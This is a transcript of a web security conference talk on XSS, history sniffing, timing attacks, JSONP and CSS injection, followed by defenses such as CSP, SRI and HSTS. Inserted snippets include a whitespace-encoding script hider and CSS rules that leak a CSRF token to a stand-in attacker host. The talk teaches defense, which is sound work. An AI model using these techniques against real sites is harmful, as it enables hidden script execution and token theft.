It's good to see everyone. I'm going to be talking today a little bit about security, client-side security, which is a little bit scary and probably boring for a lot of people, so hopefully I can twist it in a way that makes it at least somewhat interesting. I was going to do this in Spanish, but I was worried I would make a mistake and then I would be muy embarazada. That means pregnant. I don't know, Spanish speakers. Anyways, security. Security is kind of scary. It comes along with a lot of baggage, and when developers see the word security, or client-side security, or something like that, they think to themselves, "Security is very important. Someone who knows about security should take a look at all this code I'm writing," and they push it away from their own jobs, out to someone else who's a security person. I think part of that has to do with the crazy amount of acronyms used in security: CSP, SRI, CSRF, XSS, CORS, HSTS. That's enough, but I could keep going. I'll get started with an analogy for how I see security best practices actually reaching real developers, actual real-life developers, and why maybe good security hasn't necessarily caught on. So I work at Stripe. Stripe is a payments company for the web, based in San Francisco, California, in the United States, but I live in Texas. We had another speaker from Texas, so Texas is representing well. Texas has a lot of nicknames. A lot of them are not so nice, but one of them is the Lone Star State. And Texas has a lot in common with the web. One of those things is that they're both referred to as the Wild West, which is unrelated to what I'm talking about. Anyways, in 1985, Texas had a problem. Texas had a lot of problems in 1985, but we'll go with littering. You might not think that littering is something anyone would fight for, the right to litter, but at the time, some Texans defended their God-given right to litter. It was a real thing.
There were fines for littering, so some of you, if you've been to Texas, might recognize the sign; it's pretty common, even in other states. But that didn't do anything, no one seemed to care. The state tried some slogans. One of them was "Keep Texas Beautiful," which is, you know, flowers, and it's pretty and blue. And it's like: hey, all you people defending your right to litter, respond to this nice, pretty picture and this slogan, won't this make you stop littering? They might as well have just added "pretty please with a cherry on top, Keep Texas Beautiful." These slogans did not resonate with the people who were doing the littering. So they did some research, and the people doing the littering they identified as "Bubbas in pickup trucks," males 18 to 24. That was the core demographic of people throwing trash on the side of the road. So in 1985, about 30 years ago, Tim McClure and Mike Blair of GSD&M, the big advertising firm in Austin, where I'm from, teamed up with the Texas Department of Transportation and created a slogan, an anti-littering campaign called "Don't Mess with Texas." You might have heard "Don't Mess with Texas"; it's in songs, it's in movies, all that kind of thing. It's a popular phrase, and a lot of people don't know it's actually an anti-littering campaign, but it worked. They reached their core audience of prideful people who would defend Texas by not allowing you to litter. It became something. And they reduced litter on Texas highways by 72%. I wrote that down, I created that slide, and then I thought to myself: whose job is it to measure litter on the side of the highway? And why don't they just pick it up?
So my point is, with security, "hey everyone, pretty please, will you make your website secure, because it's important and it's the right thing to do" probably isn't going to be the thing that convinces us all to be secure. It has to be something that's a default, something that's built in, and something that we're prideful about and want to do because we feel strongly about it. And one of the ways I can make you feel strongly about it is to help you realize how hopeless you are. There is no hope in security. You can never win. You can patch a thousand holes and someone only has to find one. So we can also discuss how the web is evolving to fight against that model. I also wanted to note that "don't mess with XSS" probably won't work either. The key here is that web developers, not security people, are the core audience of security research. It seems like there are these external security people, but it's all of your jobs to make your applications secure by default. And web security is hard. I think Mike West once said, "All you have to do is never make a single mistake." I guess he's not wrong. He summarized it as: everyone has deadlines. Alex Russell also said, "I discount the probability of perfection." So if you combine "all you have to do is never make a single mistake" with "discounting the probability of perfection," you can guess that you're probably going to have some security flaws in your application. The core way that security flaws manifest is content injection. It's not the root cause of them, but it's how they show up. And the type of content could be anything: it's usually a script, and that's mostly what we're talking about today, but it doesn't have to be; it could be images or Flash or CSS. Content injection sounds scary and weird, but this is all it is.
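Content injection in a template boils down to this sketch (plain JavaScript standing in for a template engine; the escapeHtml helper is illustrative, not Handlebars' actual implementation):

```javascript
// Why template escaping matters: the difference between {{content}}
// (escaped) and {{{content}}} (raw) in Handlebars-style engines.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// An attacker-controlled "database row":
const items = [{ content: '<script>alert("pwned")</script>' }];

// Raw interpolation: the attacker's script tag lands on the page
// verbatim and will execute for every visitor.
const unsafe = items.map(i => `<li>${i.content}</li>`).join('');

// Escaped interpolation: the same input renders as harmless text.
const safe = items.map(i => `<li>${escapeHtml(i.content)}</li>`).join('');

console.log(unsafe);
console.log(safe);
```

The escaped version still displays the angle brackets to the user; it just never parses as markup.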
So you have a template (this is Handlebars, old Handlebars), you have some loop, and you're injecting content from some database, and inside of there you're just spitting out content. Notice I used the triple-bracket Handlebars syntax, because by default Handlebars escapes; let's say the content was supposed to be HTML. And in this case, some jerk puts a script tag into our list of items, this is what comes out, and that's a classic XSS attack. I put a script tag where you didn't expect it, you put that script tag onto your page, and now my script runs every time someone loads that page. That's content injection. Everyone always has a friend who picks a script alert as their username for your demo chat app. At Austin JS, our local meetup, every time someone demos a chat app, within the first 30 seconds ten people log in, and all of them have script tags as names. Those jerks. One such friend... this is my user agent, and side note, that's crazy. User agents are actually crazy. Anyone know what browser that is? It's obviously Mozilla, Apple, WebKit, Gecko, Chrome, Safari. Anyways, that's my user agent, and it's probably similar to yours if you use Chrome. This is my friend Mike Taylor's user agent, which seems pretty similar. But if you look closer, he added a script tag to it. I first thought that's brilliant, because your user agent gets sent on every request and things like that. But then I realized it doesn't get displayed back to you; he's really only trolling logging software and what's-my-user-agent sites. I guess. I don't know. Anyways, this is Samy. We won't focus too much on Samy, but Samy is good at hacking. He wrote something called the Samy computer worm; "JS.Spacehero" is what Norton Antivirus called it.
Really, all he did is he found an XSS vulnerability in MySpace, and he made it so that if you went to his page, it would automatically friend him and then write on your wall, or whatever MySpace had, "Samy is my hero." Then it would inject that same code into your page, so any time someone visited your page, they would also friend Samy. Overnight he became the second most popular person on MySpace, behind Tom, obviously. Not Tom Dale; I'm sure he was third at the time. So that was "Samy is my hero." The interesting part of the story is that he was then arrested under the USA PATRIOT Act, pleaded guilty to a felony charge, and wasn't allowed to use a computer for three years. Yay! For friending people on MySpace. That's crazy. I recently found out how that actually went down, and this is again totally unrelated: MySpace offered him a job, said "hey, come out to San Francisco and interview," and when he got off the plane in San Francisco, cops were waiting for him and they arrested him. So if you ever hack anyone, don't then accept a job from them. Unless you're really sure. After his three-year probation, Samy wrote something called evercookie. What evercookie does is use cookies to store data so that the next time you visit the webpage, it can get that information back. But in case someone clears their cookies, it also uses Flash cookies, Silverlight storage, CSS history sniffing, ETags, the web cache, window.name, userData, even Java exploits; pretty much, it stores your information everywhere. No matter how you try to kill it, it won't go away. There's an FAQ on the page that says: "How do I stop websites from doing this? Great question. So far I've found that using private browsing in Safari will stop all evercookie methods after a browser restart." I also found one other method, which is setting your computer on fire and buying a new one.
This has actually been mostly cleaned up. One nice thing about evercookie is that for a little while it was scary, and all the ad agencies started using it, but then browsers had a system to test against, to ask "are we vulnerable to evercookie?", and they've mostly cleaned things up. But that's an instance of a hack that you don't realize can follow you around. So, let's just detect malicious scripts. All we have to do is find something that's accessing something we don't like, or doing something like that. Well, we can start writing scripts differently. Here's a script we could write, and it's valid JavaScript, and obviously everyone knows that it's just alert(1). So you can detect malicious scripts; you just have to be able to know that that's malicious, right? Not quite the best plan, detecting malicious scripts. Sure, it couldn't hurt, but you're not going to be able to do it well. One of my favorite examples of not being able to detect malicious scripts is this one. It's a pretty good hack from Billy Hoffman, who introduced it in 2010 at JSConf. And there it is, that's the malicious code, right in between those two script tags: tab, space, tab, tab, space. Those are 8-bit-encoded characters that are then eval'd back into JavaScript. Ones and zeros, if you will. So you have a block that looks like an empty script tag in your view-source window, and it's malicious code. You cannot detect malicious code. What if we just try to get rid of the ability to inject script tags? You could take your output and, at the very end, kill all the script tags and remove them. And this would be cool, but you can inject content lots of different ways. There's the onload attribute; your links can have javascript: URLs instead of regular URLs. There are lots of things. But let's say you actually convinced all your users to turn JavaScript off entirely. Now you can't hack me, right?
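Back to that whitespace trick for a second; the encoding is simple enough to sketch (illustrative only, not Hoffman's exact code):

```javascript
// Each character of the payload becomes 8 "bits" written as tabs (1)
// and spaces (0), so the code between two script tags looks completely
// blank in View Source.
function encodeAsWhitespace(code) {
  return [...code]
    .map(ch => ch.charCodeAt(0).toString(2).padStart(8, '0'))
    .join('')
    .replace(/1/g, '\t')
    .replace(/0/g, ' ');
}

function decodeWhitespace(blob) {
  const bits = [...blob].map(ch => (ch === '\t' ? '1' : '0')).join('');
  let out = '';
  for (let i = 0; i < bits.length; i += 8) {
    out += String.fromCharCode(parseInt(bits.slice(i, i + 8), 2));
  }
  return out;
}

const hidden = encodeAsWhitespace('alert(1)');
// 'hidden' contains only tabs and spaces; the attacker's loader would
// read it back and eval() the result.
console.log(decodeWhitespace(hidden)); // "alert(1)"
```

A scanner looking for suspicious tokens sees nothing but whitespace, which is the point.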
So we can talk about CSS hacks, more content injection. The most popular CSS hack is :visited history sniffing. You know how whenever you have been to a link it's purple, and if you haven't, it's blue? Well, that reveals a lot of information. I can just inject, say, 300 million URLs onto your page, check the color of them all, and see what sites you've been to. The top 300 million sites would be a good start. That sounds pretty harmless, like, how many could you check in a second? But some people did some pretty scary things with Google searches. If you know you're in Chrome, you know the set of parameters that Chrome injects into a Google search whenever you use the omnibox up top. So you can inject a bunch of different Google search URLs. And what someone did is put in scary health things, like dealing with cancer, or going into debt, things you might search for if you have a problem. They enumerated a bunch of different versions of those, and they could more or less reliably find out if you had ever searched for treatments for different diseases. And then they said: what if your healthcare provider could do this? It's totally a real thing that could actually happen and really affect people. I know healthcare is not necessarily a good example in Spain, but bear with the Americans. So the :visited selector has actually been changed now in most newer browsers. More or less, they fixed it by saying "we're just going to lie to you about the color of links," which is cool. It's pretty difficult, because you also have to handle child selectors and all those types of things. So let's consider that fixed. But then we can add another hack into the mix, and this is called a timing attack. Timing attacks haven't traditionally been very possible in browsers.
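Timing attacks are easiest to see outside the browser first. Here's a sketch of the classic early-exit password comparison and the standard constant-time fix (plain JavaScript, illustrative only):

```javascript
// Early-exit comparison: bails at the first mismatching character, so
// better guesses take measurably longer to fail.
function leakyEquals(secret, guess) {
  if (secret.length !== guess.length) return false;
  for (let i = 0; i < secret.length; i++) {
    if (secret[i] !== guess[i]) return false; // leaks timing
  }
  return true;
}

// Constant-time comparison: always walks the whole string and folds
// every mismatch into one accumulator, so timing no longer depends on
// where the first mismatch is.
function constantTimeEquals(secret, guess) {
  if (secret.length !== guess.length) return false;
  let diff = 0;
  for (let i = 0; i < secret.length; i++) {
    diff |= secret.charCodeAt(i) ^ guess.charCodeAt(i);
  }
  return diff === 0;
}

console.log(leakyEquals('password123', 'password123'));   // true
console.log(constantTimeEquals('password123', 'qwerty12345')); // false
```

In real Node code you'd use crypto.timingSafeEqual on buffers rather than rolling your own.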
That's because timers in browsers suck really badly. I call that security by inaccuracy. But a timing attack really comes down to this; the most famous timing attack is password checks. If my password is "password123" and I check it against the password you typed in, I check "p" against the first letter of whatever you typed, and if the first letter fails, I say, no, this is a failure. Then you type something that starts with "p," and it takes a little bit longer to fail. The longer it takes to fail, the more of the guess I know is correct, and people can work backwards and figure out passwords from that. That's traditionally been impossible in browsers, but now we have this cool new thing called requestAnimationFrame. It's a very reliable timer in browsers. And we also have the :visited selector from before, except it's going to lie to you about what color a link is, so you can't get the visited information from it directly. But you can get something just as valuable. Let's say we added a really gross drop shadow, a text-shadow, to our text. And here's the hack. Do you see it, do you feel it yet? This powerful hack, it just convinces you via hypnosis to type in your password. What's actually happening is that this one takes less than 16 milliseconds to render, and this one takes well over 60 milliseconds to render, because it's hard for GPUs to render drop shadows. The only way we could fix this is to make everything render more slowly, and that's never going to happen. So you can actually still pretty reliably use the CSS history sniffing technique with timing. At least now it takes a lot longer, it's a lot more computationally expensive, and you have to keep the victim on the page, but I don't think it will ever fully go away. So let's move on. JSONP is something that you use. It's called JSON with padding.
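Mechanically, JSONP is just this (a sketch; the endpoint and callback names are made up, and the browser-only parts are left as comments):

```javascript
// JSONP: no XHR at all, just a <script> tag whose response is code
// that calls a global function you defined.
let received = null;
let exfiltrated = null;

function jsonp(url, callbackName, onData) {
  globalThis[callbackName] = onData;
  // In a browser you'd now do:
  //   const s = document.createElement('script');
  //   s.src = url + '?callback=' + callbackName;
  //   document.head.appendChild(s);
  // and the server replies with executable JS like:
  //   myCallback({"user": "alex"});
}

jsonp('https://api.example.com/user', 'myCallback', data => {
  received = data; // the app thinks everything is normal
});

// A *malicious* response is also just code, so it can do extra work
// before behaving normally:
function maliciousResponse() {
  exfiltrated = 'ssn-scraped-from-the-page'; // stand-in for reading the DOM
  globalThis.myCallback({ user: 'alex' });   // then hand back real-looking data
}
maliciousResponse();

console.log(received, exfiltrated);
```

The app's callback fires with plausible data either way, which is why this kind of siphoning goes unnoticed.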
I say "JSON," some people say it the other way, and Douglas Crockford, who created it, finally weighed in a few years back, and he was a jerk and said it's pronounced "JSON." Not a cool move. Anyways, I like to call JSONP "JSON, Pretty insecure." Nailed it. "Hey, I'd really like it if someone could run arbitrary dynamic scripts on my page." That's you, JSONP user. Anyways, whenever you do this, a JSONP request, it feels like Ajax, it feels like you're making a request to some other endpoint, but really all that happens is you inject a script onto your page, and the content that comes back can contain dynamic data. It's this cross-domain hack that's beautiful and helped the web grow, but you're also allowing someone to run arbitrary dynamic code on your page. So what could they do? What if the callback, the script they injected, looked like this? It goes and grabs the Social Security number out of the page, makes a quick request with that number in it, and then still gives you your data back, so it feels like things are still working just fine, but it's also siphoning off all these Social Security numbers. Just don't deal with Social Security numbers in general. So, you should probably use CORS. That's not a real Tumblr, by the way; people get mad at me whenever I show this. I should change that. Not a real Tumblr. Maybe I'll make it. Someone should make a "you should probably use CORS" Tumblr. But anyways, we've gotta go. Cross-origin resource sharing, that's CORS. You use headers to whitelist the different domains you're willing to talk to, and that's a better solution than JSONP for talking across domains. There's a real website you can go to that helps you figure out how to enable it on different servers. So, just protect against JS and script tag injection and CSS injection, and you're good, right? Let's talk about CSRF a little bit.
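The CSS trick for brute-forcing a CSRF token can be sketched as selector generation (domain, field name, and prefixes here are all made up for illustration):

```javascript
// One CSS rule per candidate token prefix: if the hidden input's value
// starts with that prefix, the browser fetches the attacker's "image"
// URL, leaking the match to the attacker's server log.
function csrfProbeCss(prefixes) {
  return prefixes
    .map(p =>
      `input[name="csrf"][value^="${p}"] { background: url(https://evil.example/leak?t=${encodeURIComponent(p)}); }`
    )
    .join('\n');
}

// With value^= (starts-with) you don't need a rule per full token; you
// recover it one character at a time, a handful of rules per position.
// And because the rules are so repetitive, the payload gzips extremely
// well.
console.log(csrfProbeCss(['0', '1', '2']));
```

The defense CSP gives you here is that the leak URL is on a foreign origin, so img-src rules block the request entirely.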
CSRF protection is something we can talk about. It's a bit of a server-side security measure, but it stops people from being able to load a page from a different website, say in an iframe, and have that page perform an action as you. Other people can't like things on Facebook for you just by loading up the URL that gets requested whenever you click Like. So, this CSRF value here is pretty crappy; it's only four characters. But imagine I was able to inject CSS anywhere into your page, something that looks like this: if the token's value is 0001, then a request fires off for this image, which may or may not even exist. Then I could enumerate that a couple of times, maybe three times, or maybe, say, two million times, and then I have two million attempts at figuring out your CSRF token. I just watch the server log, and if one of them ever gets requested, I have a bunch of information about your IP address and all those things, and I also have your CSRF token. And you say that's huge, but all of you ship two-megabyte mobile apps, right? And it gzips; repetitive rules like this are the core use case for gzip, it's really great for gzip. And it gets worse than that. The worst possible world is where you actually do all the security protections you're supposed to: you stop content injection, you do all that stuff, you've actually done everything right, and then browser vulnerabilities can still get you in the end. This is from a white paper from a few years back. A lot of it has been somewhat cleaned up, but not entirely; it's also a little bit infeasible, but it could become more and more feasible. It's cross-domain data snooping with SVG filters and OCR, which is its own talk title, I think. They probably actually did give a talk. Let's say you injected an iframe, and then you're able to put an SVG filter over it that grabs contrast. Now you can have an SVG that represents the page behind it.
So you kind of have an image of the iframe behind you, and then you can use OCR to go from image to text and grab text out of the page. Even if this person didn't do anything wrong, I can still grab words out of there. One of the things that was tough was different fonts and different locations; how do you OCR that well? And what someone figured out is that you can actually load up the view-source: URL, and you get the perfect, consistent source-code background. We know it's going to be 14-point Consolas or something; I wonder what they use. Anyways, that sucks. We need a new approach, and that approach is called Content Security Policy, CSP. Recently one of the people who works on it announced that she wants to change the name to increase CSP adoption. Like I said, there are a lot of acronyms. They're renaming it to BatShield. It's a backronym: trustworthy, secure, internet-enabled, lightweight fence. And if you look lower, she forgot the H and added it later; it means helper. She drew this helpful diagram for it, so BatShield is what we're talking about today, not CSP, which I think is great, much better. CSP is a header. It looks a little bit like this, though obviously not with that many directives. What it allows you to do is, by default, more or less lock everything down entirely; you can't do anything on your own page, even from your own origin, except render HTML. Then it lets you open up little holes for the things that you want to use, and hopefully only those things. By default, it disallows inline JS and CSS, so if anyone is able to inject that content, it won't even run. It also disallows eval, so even if they inject that whitespace stuff, there's no way for them to eval it anywhere. It disallows all cross-domain JavaScript, CSS, images, fonts, et cetera, even SWF files.
So even if you're able to inject CSS to match a CSRF token, that image is on a different domain, it's not in the rule set, and that person never gets your CSRF token. It also allows you to report violations: any time there's a violation, a URL gets hit that says "this was violated by this IP address at this time," blah, blah, blah, and you can follow up on those. It's a little bit of a mess, because browser plugins almost universally violate your CSP, so the output is really noisy, but if you can filter it well enough, it's kind of nice. The key is that this is a whitelist. It's the opposite of trying to figure out all the possible hacks and then preventing each of them individually. It says: I want to prevent everything, even good stuff, and then open up just the little things that I need. And some of that kind of stinks, because it's good for performance to inline your CSS at the top of the page for the critical render path, so what do you do about that? That's where CSP Level 2 comes in. It's kind of out; it's in some browsers, but not all of them yet. It allows you to use integrity hashes: it's fine to run this inline CSS as long as it matches this hash. So it lets you whitelist specific pieces of CSS or JavaScript that you're allowed to inline, while generic injected things still won't run. I think that's really good. It also degrades gracefully from CSP 1, which is cool, but I won't go into it. There are pages where you can learn more about Content Security Policy; cspisawesome.com is a good one. There are tools you can integrate with: Helmet is one for Express that helps you inject all these kinds of security headers. If you use Ember, there's ember-cli-content-security-policy, which is built into Ember CLI by default, so if you use Ember CLI, you'd actually have to actively turn off Content Security Policy, or BatShield.
And that's great. That's what I mean by making security the default: by using Ember, you're probably going to have CSP on by default, and that's what we need to work towards. Library authors need to help people have security by default and then opt out of it, rather than the other way around. SRI is a new acronym that we get to learn, and it stands for Subresource Integrity. If you want to load scripts, especially from external domains, like jQuery from a CDN or Google Analytics from somewhere else, you can add a hash and say "this script must match this hash." If it gets changed, don't run it, because I don't know what the change was, and I need to know about those changes. This sounds a little bit crazy, like, why would I ever need to do that for the jQuery CDN? But this is a copy of jQuery that I downloaded on my mobile phone while I was in London once, and it looks pretty normal. It looks like regular jQuery, but if you zoom in, it starts looking a little weirder. You might notice some weird stuff, specifically in this region here. That does not look like regular jQuery to me. There's a document.write in there suddenly. I know jQuery isn't that silly. Over HTTP connections, that mobile network was injecting ads into every page that used jQuery from a CDN. And this would fail the SRI check, the subresource integrity, because that script would no longer hash to the same value it used to. I think that's really great, especially for cross-domain things. You can actually reference a fallback script, to say "if that script gets changed, load one locally," which is kind of nifty. SRI is still a working draft, but it's shipped in Chrome; there's a bug with UTF-8, so figure that out. There's an SRI hash generator if you don't want to figure out what things hash to; you can just put in a URL, get the hash, and use it.
So you don't even need fancy tooling, but there is fancy tooling. And you can go read these specs, or contribute and say "I hate this" or "this is good." Good security goes beyond just preventing content injection, which is mostly what we've been talking about. There are other measures you can use. "HTTPS everywhere" is a thing, and you should be using HTTPS, but I don't like "HTTPS everywhere" because it's not specific enough. I want HTTPS only. You shouldn't have an HTTP version of your site; there's no reason to have it. It's not slower, you can get HTTPS certificates for free now, and that's only going to get easier. So if someone hits your HTTP site, you should 301 them to your HTTPS site, much like my website does. A beacon for all people. I really lost it there. Another good thing: once they do hit the HTTPS site, add the Strict-Transport-Security header, that's HSTS. This is pinning. It says: now that they've been to my website over HTTPS, even if someone tries to go to the HTTP page, don't even let the request for the HTTP page go through; just bump them over to HTTPS. That's a really good thing. And set a big max-age on it, because you're never, ever going to serve anything over HTTP anymore, right? So that's HSTS. And you can actually promise, like give the promise ring of promises, to be HTTPS forever if you want. There's this page, pretty hidden in some mailing list it was posted on, but I happen to follow that very boring web security mailing list, and a Google engineer created it and said, "If anyone wants to be in the Chrome pinned HTTPS list, just add your domain here." I think like three people initially did; I was one of them.
And it used to be that if you were a big company, like Stripe or something like that, you could ask Chrome: don't even wait for the first time someone requests this site to get my HSTS header; just never let anyone use Chrome to hit stripe.com over HTTP. So Chrome actually has this built-in list of sites that are already forced to HTTPS. And I added alexsexton.com. At the time it was like Dropbox, Stripe, Bank of America, alexsexton.com. It was really great. Now it's Cyber Shambles and, I don't know, URL Kitten; it's nice. Anyways, this list is actually shared now by all the browsers; IE and Firefox and Safari all pull it in separately. So you cannot hit alexsexton over HTTP anymore, which is cool. The .com, alexsexton.com, not me. You could hit me over HTTP, I guess. Frame busting is another good thing to do. We talked about that SVG hack. Unless you explicitly want to be iframed, like the Like button, if you are the Like button, you want to be an iframe in someone's page. But for the most part, I never want someone iframing stripe.com, and I never want them iframing alexsexton.com. So you can send a header. This header is old; X-Frame-Options has actually been superseded by CSP, but there are still plenty of browsers that it helps, so you can still throw it in there. The idea is that if we add all these different headers, and we lock everything down by default, we're secure by default, and then we open up little holes. Then you can rely a little less on being perfect every time and just build web apps like you already want to, as long as you have that good base. But it only matters if we all buy in. So: don't mess with the web. Everyone, please turn on all your security stuff. Pretty please with sugar on top. I don't actually have a good slogan for you.
I'll have to talk to GSD&M about that. But thank you, guys.